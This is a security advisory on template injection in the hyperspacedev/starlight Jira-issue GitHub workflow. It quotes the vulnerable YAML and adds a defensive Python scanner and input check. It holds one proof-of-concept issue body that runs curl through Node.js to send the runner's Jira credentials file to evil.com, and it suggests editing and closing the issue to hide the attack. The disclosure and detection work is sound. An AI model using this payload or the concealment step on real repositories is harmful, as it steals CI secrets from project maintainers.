Automatic GitHub workflow in hyperspacedev/starlight repository is vulnerable to template injection from user comments.
hyperspacedev/starlight repository, Root branch.
The Jira Create issue step (atlassian/gajira-create) in the jira-create.yml workflow is vulnerable to template injection. The expressions ${{ github.event.issue.title }} and ${{ github.event.issue.body }} are used to format the input values passed to the atlassian/gajira-create action:
    - name: Jira Create issue
      uses: atlassian/gajira-create@v2.0.0
      with:
        project: HS
        issuetype: Task
        summary: ${{ github.event.issue.title }}
        description: ${{ github.event.issue.body }}
The action has a hidden feature: it expands {{ }} templates internally. As a result, when the issue body contains an expression in double curly braces, that expression is evaluated by Node.js inside the action.
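As an added example (not code from the advisory, the starlight repository or Atlassian), the following Python script shows two checks a maintainer can run: a scanner that flags workflow lines where a user-controlled event field is interpolated into a step input or a run script, and a function that detects a {{ ... }} template in an issue body before it is handed to an action that expands such templates internally. The workflow text is a constructed copy of the fragment quoted above with one extra trusted step, and the list of untrusted context fields is an assumption (representative, not exhaustive).

```python
import re

# Constructed sample, not the repository's actual file: the workflow fragment
# quoted in the advisory, plus one step that only uses a trusted context value.
SAMPLE_WORKFLOW = """\
jobs:
  jira:
    runs-on: ubuntu-latest
    steps:
      - name: Jira Create issue
        uses: atlassian/gajira-create@v2.0.0
        with:
          project: HS
          issuetype: Task
          summary: ${{ github.event.issue.title }}
          description: ${{ github.event.issue.body }}
      - name: Print commit (trusted value)
        run: echo "${{ github.sha }}"
"""

# Event context fields that an external user controls directly.
# Assumption: a representative list, not an exhaustive one.
UNTRUSTED_CONTEXTS = (
    "github.event.issue.title",
    "github.event.issue.body",
    "github.event.comment.body",
    "github.event.pull_request.title",
    "github.event.pull_request.body",
    "github.event.head_commit.message",
    "github.head_ref",
)

# A GitHub Actions expression, evaluated by GitHub before the step runs: ${{ ... }}
ACTIONS_EXPR_RE = re.compile(r"\$\{\{\s*(.+?)\s*\}\}")

# A template that an action may expand internally: {{ ... }} without a leading '$',
# so it passes through GitHub's own expression evaluation untouched.
ACTION_TEMPLATE_RE = re.compile(r"(?<!\$)\{\{.+?\}\}")


def find_untrusted_interpolations(workflow_text):
    """Return one finding per (line, field) where an untrusted event field is
    interpolated into the workflow, whether as a step input or in a run script."""
    findings = []
    for lineno, line in enumerate(workflow_text.splitlines(), start=1):
        for match in ACTIONS_EXPR_RE.finditer(line):
            expr = match.group(1)
            for context in UNTRUSTED_CONTEXTS:
                if context in expr:
                    findings.append({"line": lineno, "context": context, "text": line.strip()})
    return findings


def contains_action_template(value):
    """True if a user-supplied string carries a {{ ... }} template that an action
    with internal template expansion would evaluate; reject or escape such input."""
    return ACTION_TEMPLATE_RE.search(value) is not None


if __name__ == "__main__":
    for finding in find_untrusted_interpolations(SAMPLE_WORKFLOW):
        print(f"line {finding['line']}: {finding['context']} used in: {finding['text']}")
    for body in ("Login page shows a blank screen", "Hello {{ 1 + 1 }}"):
        print(repr(body), "->", "REJECT" if contains_action_template(body) else "ok")
```

Run against the sample, the scanner reports the summary and description lines of the Jira step and stays silent on the step that only uses github.sha; the second check lets a workflow gate the issue body (for example in a preceding step) so that text containing a {{ }} template never reaches an action that expands it.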
This vulnerability allows arbitrary code execution in the context of the GitHub runner. For example, a user may create an issue with the body:
{{ process.mainModule.require('child_process').exec(`curl -d @${process.env.HOME}/.jira.d/credentials http://evil.com`) }}
which will exfiltrate the secret Jira API token to the attacker-controlled server. To make the attack less visible, an attacker may then edit the issue to read "Never mind, my bad" and close it.
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2020-210 in any communication regarding this issue.